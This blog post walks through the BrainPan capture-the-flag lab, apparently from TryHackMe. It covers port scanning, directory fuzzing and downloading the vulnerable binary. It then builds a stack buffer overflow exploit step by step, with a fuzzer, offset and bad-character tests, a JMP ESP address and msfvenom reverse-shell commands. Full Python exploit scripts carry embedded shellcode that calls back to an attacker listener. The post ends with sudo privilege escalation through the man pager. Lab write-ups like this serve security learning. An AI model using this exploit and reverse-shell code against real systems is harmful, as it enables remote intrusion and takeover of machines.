BLOG

BrainPanOne Walkthrough

$ nmap -p0-65535 -vvv 10.10.253.240 -T4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 18:56 IST
Initiating Ping Scan at 18:56
Scanning 10.10.253.240 [2 ports]
Completed Ping Scan at 18:56, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:56
Completed Parallel DNS resolution of 1 host. at 18:56, 6.54s elapsed
DNS resolution of 1 IPs took 6.54s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 18:56
Scanning 10.10.253.240 [2 ports]
Discovered open port 10000/tcp on 10.10.253.240
Discovered open port 9999/tcp on 10.10.253.240
Completed Connect Scan at 18:56, 0.16s elapsed (2 total ports)
Nmap scan report for 10.10.253.240
Host is up, received conn-refused (0.16s latency).
Scanned at 2021-07-15 18:56:17 IST for 7s

PORT      STATE SERVICE          REASON
9999/tcp  open  abyss            syn-ack
10000/tcp open  snet-sensor-mgmt syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.89 seconds
$ nmap -p9999,10000 -sV -sC 10.10.253.240
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 18:59 IST
Nmap scan report for 10.10.253.240
Host is up (0.16s latency).

PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
| fingerprint-strings:
|   NULL:
|     _| _|
|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
|     _|_| _| _| _| _| _| _| _| _| _| _| _|
|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
|     [________________________ WELCOME TO BRAINPAN _________________________]
|_    ENTER THE PASSWORD
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.91%I=7%D=7/15%Time=60F0382F%P=x86_64-pc-linux-gnu%r(NU
SF:LL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|
SF:\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\
SF:x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x
SF:20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x
SF:20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x
SF:20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x
SF:20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x
SF:20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x
SF:20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x
SF:20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.96 seconds

From the scanning phase, we got the brainpan binary is running.

Lets check the logic of brainpan

$ nc -nv 10.10.253.240 9999
(UNKNOWN) [10.10.253.240] 9999 (?) open
_|                            _|
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD

                          >> password
                          ACCESS DENIED

so once we get connected, will be greeted with banner and need to enter the password

Lets check web server

Home

There is nothing much on the home page.

Lets fuzz for directories and files

$ ffuf -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.253.240:10000/FUZZ -ic -e .php,.html,.txt,.php3,.php5,php7

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.253.240:10000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .html .txt .php3 .php5 php7
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 215, Words: 7, Lines: 9]
index.html              [Status: 200, Size: 215, Words: 7, Lines: 9]
bin                     [Status: 301, Size: 0, Words: 1, Lines: 1]
:: Progress: [1543829/1543829] :: Job [1/1] :: 172 req/sec :: Duration: [0:00:35] :: Errors: 0 ::

We have bin directory, Lets navigate to it.

brainpanexe

Download it and check the binary.

brainbin

we got to know that its same binary running on port 9999 in target server

Lets fuzz for BOF

#!/usr/bin/env python3

import socket, time, sys

ip = "192.168.30.133"
port = 9999

timeout = 5


password = b"A" * 100


while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))

      # For receiving Banner
      s.recv(2048)

      print("Fuzzing with {} bytes".format(len(password)))

      # sending password
      s.send(password)

      # For receiving Access Denied message
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(password)))
    sys.exit(0)
  password += b"A"*100
  time.sleep(1)
$ ./fuzzy.py
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing crashed at 600 bytes

Testing for crash at Roughly 600 bytes

#!/usr/bin/env python3

import socket
import struct


ip = "192.168.30.133"
port = 9999

total_length = 600


payload = [
        b"A"*total_length
]

payload = b"".join(payload)

s = socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payload)
s.close()

Accessvilolation

Finding the offset

msf-pattern_create -l 600
#!/usr/bin/env python3

import socket

ip = "192.168.30.133"
port = 9999

total_length = 600


offset = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"

s = socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(offset)
s.close()

EIP

$ msf-pattern_offset -l 600 -q 35724134
[*] Exact match at offset 524

we got the offset as 524

Verifying the offset

#!/usr/bin/env python3

import socket

ip = "192.168.30.133"
port = 9999


total_length = 600

offset=524

EIP=b"BBBB"

payload = [ b"A"*offset,
            EIP,
            b"C"*int(total_length-offset-len(EIP))
]

payload = b"".join(payload)

s = socket.socket()
s.connect( (ip, port))
s.recv(2048)
s.send(payload)
s.close()

offsetverified

Knowing the bad characters

!mona bytearray -b "\x00"

monabytearray

#!/usr/bin/env python3

import socket

ip = "192.168.30.133"
port = 9999


total_length = 600

offset = 524

EIP=b"BBBB"

allchars = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

payload = [ b"A"*offset,
        EIP,
        allchars,
        b"C"*int(total_length - offset - len(EIP) - len(allchars))
]

payload = b"".join(payload)

s = socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payload)
s.close()

monaesp

!mona compare -f C:\Users\chandu\AppData\Local\VirtualStore\Program Files (x86)\Immunity Inc\Immunity Debugger\bytearray.bin -a 0028F930

badchars

From this we can know nullbyte is the only bad character

Knowing the Address for Jumping to ESP using EIP

!mona jmp -r esp -cpb "\x00"

addressjmpesp

We got the address 0x311712f3

Generating the payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.30.133 LPORT=9898 -b "\x00" -f py

Executing the script

#!/usr/bin/env python3

import socket
import struct

ip = "192.168.30.133"
port = 9999


total_length = 600

offset=524

NEW_EIP = struct.pack("<I", 0x311712f3)

nop_ramp = b"\x90" * 16


#EIP=b"BBBB"

buf =  b""
buf += b"\xbd\x9e\xc2\x8d\x91\xda\xdd\xd9\x74\x24\xf4\x5a\x33"
buf += b"\xc9\xb1\x52\x31\x6a\x12\x03\x6a\x12\x83\x5c\xc6\x6f"
buf += b"\x64\x9c\x2f\xed\x87\x5c\xb0\x92\x0e\xb9\x81\x92\x75"
buf += b"\xca\xb2\x22\xfd\x9e\x3e\xc8\x53\x0a\xb4\xbc\x7b\x3d"
buf += b"\x7d\x0a\x5a\x70\x7e\x27\x9e\x13\xfc\x3a\xf3\xf3\x3d"
buf += b"\xf5\x06\xf2\x7a\xe8\xeb\xa6\xd3\x66\x59\x56\x57\x32"
buf += b"\x62\xdd\x2b\xd2\xe2\x02\xfb\xd5\xc3\x95\x77\x8c\xc3"
buf += b"\x14\x5b\xa4\x4d\x0e\xb8\x81\x04\xa5\x0a\x7d\x97\x6f"
buf += b"\x43\x7e\x34\x4e\x6b\x8d\x44\x97\x4c\x6e\x33\xe1\xae"
buf += b"\x13\x44\x36\xcc\xcf\xc1\xac\x76\x9b\x72\x08\x86\x48"
buf += b"\xe4\xdb\x84\x25\x62\x83\x88\xb8\xa7\xb8\xb5\x31\x46"
buf += b"\x6e\x3c\x01\x6d\xaa\x64\xd1\x0c\xeb\xc0\xb4\x31\xeb"
buf += b"\xaa\x69\x94\x60\x46\x7d\xa5\x2b\x0f\xb2\x84\xd3\xcf"
buf += b"\xdc\x9f\xa0\xfd\x43\x34\x2e\x4e\x0b\x92\xa9\xb1\x26"
buf += b"\x62\x25\x4c\xc9\x93\x6c\x8b\x9d\xc3\x06\x3a\x9e\x8f"
buf += b"\xd6\xc3\x4b\x1f\x86\x6b\x24\xe0\x76\xcc\x94\x88\x9c"
buf += b"\xc3\xcb\xa9\x9f\x09\x64\x43\x5a\xda\x4b\x3c\x7a\x9a"
buf += b"\x24\x3f\x82\xbc\x1e\xb6\x64\xaa\x4e\x9f\x3f\x43\xf6"
buf += b"\xba\xcb\xf2\xf7\x10\xb6\x35\x73\x97\x47\xfb\x74\xd2"
buf += b"\x5b\x6c\x75\xa9\x01\x3b\x8a\x07\x2d\xa7\x19\xcc\xad"
buf += b"\xae\x01\x5b\xfa\xe7\xf4\x92\x6e\x1a\xae\x0c\x8c\xe7"
buf += b"\x36\x76\x14\x3c\x8b\x79\x95\xb1\xb7\x5d\x85\x0f\x37"
buf += b"\xda\xf1\xdf\x6e\xb4\xaf\x99\xd8\x76\x19\x70\xb6\xd0"
buf += b"\xcd\x05\xf4\xe2\x8b\x09\xd1\x94\x73\xbb\x8c\xe0\x8c"
buf += b"\x74\x59\xe5\xf5\x68\xf9\x0a\x2c\x29\x09\x41\x6c\x18"
buf += b"\x82\x0c\xe5\x18\xcf\xae\xd0\x5f\xf6\x2c\xd0\x1f\x0d"
buf += b"\x2c\x91\x1a\x49\xea\x4a\x57\xc2\x9f\x6c\xc4\xe3\xb5"

shellcode = buf

payload = [ b"A"*offset,
        NEW_EIP,
        nop_ramp,
        shellcode,
        b"C"*int(total_length - offset - len(NEW_EIP) - len(nop_ramp) - len(shellcode))
]

payyload = b"".join(payload)
s=socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payyload)
s.close()

Getting the initial access

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=9898 -b "\x00" -f py --> target is linux machine
#!/usr/bin/env python3

import socket
import struct

ip = "192.168.30.133" -----------> target ip
port = 9999


total_length = 600

offset=524

NEW_EIP = struct.pack("<I", 0x311712f3)

nop_ramp = b"\x90" * 16


#EIP=b"BBBB"

buf =  b"" -----------> modify this payload with the payload generated
buf += b"\xbd\x9e\xc2\x8d\x91\xda\xdd\xd9\x74\x24\xf4\x5a\x33"
buf += b"\xc9\xb1\x52\x31\x6a\x12\x03\x6a\x12\x83\x5c\xc6\x6f"
buf += b"\x64\x9c\x2f\xed\x87\x5c\xb0\x92\x0e\xb9\x81\x92\x75"
buf += b"\xca\xb2\x22\xfd\x9e\x3e\xc8\x53\x0a\xb4\xbc\x7b\x3d"
buf += b"\x7d\x0a\x5a\x70\x7e\x27\x9e\x13\xfc\x3a\xf3\xf3\x3d"
buf += b"\xf5\x06\xf2\x7a\xe8\xeb\xa6\xd3\x66\x59\x56\x57\x32"
buf += b"\x62\xdd\x2b\xd2\xe2\x02\xfb\xd5\xc3\x95\x77\x8c\xc3"
buf += b"\x14\x5b\xa4\x4d\x0e\xb8\x81\x04\xa5\x0a\x7d\x97\x6f"
buf += b"\x43\x7e\x34\x4e\x6b\x8d\x44\x97\x4c\x6e\x33\xe1\xae"
buf += b"\x13\x44\x36\xcc\xcf\xc1\xac\x76\x9b\x72\x08\x86\x48"
buf += b"\xe4\xdb\x84\x25\x62\x83\x88\xb8\xa7\xb8\xb5\x31\x46"
buf += b"\x6e\x3c\x01\x6d\xaa\x64\xd1\x0c\xeb\xc0\xb4\x31\xeb"
buf += b"\xaa\x69\x94\x60\x46\x7d\xa5\x2b\x0f\xb2\x84\xd3\xcf"
buf += b"\xdc\x9f\xa0\xfd\x43\x34\x2e\x4e\x0b\x92\xa9\xb1\x26"
buf += b"\x62\x25\x4c\xc9\x93\x6c\x8b\x9d\xc3\x06\x3a\x9e\x8f"
buf += b"\xd6\xc3\x4b\x1f\x86\x6b\x24\xe0\x76\xcc\x94\x88\x9c"
buf += b"\xc3\xcb\xa9\x9f\x09\x64\x43\x5a\xda\x4b\x3c\x7a\x9a"
buf += b"\x24\x3f\x82\xbc\x1e\xb6\x64\xaa\x4e\x9f\x3f\x43\xf6"
buf += b"\xba\xcb\xf2\xf7\x10\xb6\x35\x73\x97\x47\xfb\x74\xd2"
buf += b"\x5b\x6c\x75\xa9\x01\x3b\x8a\x07\x2d\xa7\x19\xcc\xad"
buf += b"\xae\x01\x5b\xfa\xe7\xf4\x92\x6e\x1a\xae\x0c\x8c\xe7"
buf += b"\x36\x76\x14\x3c\x8b\x79\x95\xb1\xb7\x5d\x85\x0f\x37"
buf += b"\xda\xf1\xdf\x6e\xb4\xaf\x99\xd8\x76\x19\x70\xb6\xd0"
buf += b"\xcd\x05\xf4\xe2\x8b\x09\xd1\x94\x73\xbb\x8c\xe0\x8c"
buf += b"\x74\x59\xe5\xf5\x68\xf9\x0a\x2c\x29\x09\x41\x6c\x18"
buf += b"\x82\x0c\xe5\x18\xcf\xae\xd0\x5f\xf6\x2c\xd0\x1f\x0d"
buf += b"\x2c\x91\x1a\x49\xea\x4a\x57\xc2\x9f\x6c\xc4\xe3\xb5"

shellcode = buf

payload = [ b"A"*offset,
        NEW_EIP,
        nop_ramp,
        shellcode,
        b"C"*int(total_length - offset - len(NEW_EIP) - len(nop_ramp) - len(shellcode))
]

payyload = b"".join(payload)
s=socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payyload)
s.close()

By modifying and running the script, we got initial access.

initialaccess

Spawning TTY

whoami
puck
date
Thu Jul 15 10:31:22 CDT 2021
python -c 'import pty; pty.spawn("/bin/bash")'
puck@brainpan:/home/puck$ ^Z
[1]  + 10624 suspended  nc -nlvp 9898

$ stty raw -echo; fg                                                                                                 [1]  + 10624 continued  nc -nlvp 9898

puck@brainpan:/home/puck$ export TERM=xterm
puck@brainpan:/home/puck$ ls -l /home
total 12
drwx------ 4 anansi  anansi  4096 Mar  4  2013 anansi
drwx------ 7 puck    puck    4096 Mar  6  2013 puck
drwx------ 3 reynard reynard 4096 Mar  4  2013 reynard

puck@brainpan:/home/puck$ sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
  - network
  - proclist
  - manual [command]
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util network
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP qlen 1000
    link/ether 02:be:d5:89:ab:bf brd ff:ff:ff:ff:ff:ff
    inet 10.10.253.240/16 brd 10.10.255.255 scope global eth0
    inet6 fe80::be:d5ff:fe89:abbf/64 scope link
       valid_lft forever preferred_lft forever
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util proclist
top - 10:38:34 up  2:19,  0 users,  load average: 0.00, 0.01, 0.03
Tasks:  72 total,   1 running,  71 sleeping,   0 stopped,   0 zombie
%Cpu(s):  0.1 us,  0.1 sy,  0.0 ni, 99.5 id,  0.2 wa,  0.0 hi,  0.0 si,  0.1 st
KiB Mem:   2064648 total,   135728 used,  1928920 free,    12600 buffers
KiB Swap:   520188 total,        0 used,   520188 free,    82156 cached

  PID USER      PR  NI  VIRT  RES  SHR S  %CPU %MEM    TIME+  COMMAND
    1 root      20   0  3500 1864 1280 S   0.0  0.1   0:00.73 init
    2 root      20   0     0    0    0 S   0.0  0.0   0:00.00 kthreadd
    3 root      20   0     0    0    0 S   0.0  0.0   0:00.22 ksoftirqd/0
    5 root      20   0     0    0    0 S   0.0  0.0   0:00.21 kworker/u:0
    6 root      rt   0     0    0    0 S   0.0  0.0   0:00.00 migration/0
    7 root      rt   0     0    0    0 S   0.0  0.0   0:00.03 watchdog/0
    8 root       0 -20     0    0    0 S   0.0  0.0   0:00.00 cpuset
    9 root       0 -20     0    0    0 S   0.0  0.0   0:00.00 khelper
   10 root      20   0     0    0    0 S   0.0  0.0   0:00.00 kdevtmpfs
   11 root       0 -20     0    0    0 S   0.0  0.0   0:00.00 netns
   12 root      20   0     0    0    0 S   0.0  0.0   0:00.00 xenwatch
   13 root      20   0     0    0    0 S   0.0  0.0   0:00.15 xenbus
   14 root      20   0     0    0    0 S   0.0  0.0   0:00.01 sync_supers
   15 root      20   0     0    0    0 S   0.0  0.0   0:00.00 bdi-default
   16 root       0 -20     0    0    0 S   0.0  0.0   0:00.00 kintegrityd
   17 root       0 -20     0    0    0 S   0.0  0.0   0:00.00 kblockd
   18 root       0 -20     0    0    0 S   0.0  0.0   0:00.00 ata_sff

puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual
No manual entry for manual
puck@brainpan:/home/puck$ man manual
No manual entry for manual
puck@brainpan:/home/puck$

Using man command to escalate privileges

sudo /home/anansi/bin/anansi_util manual man

manprivesc

rootaccess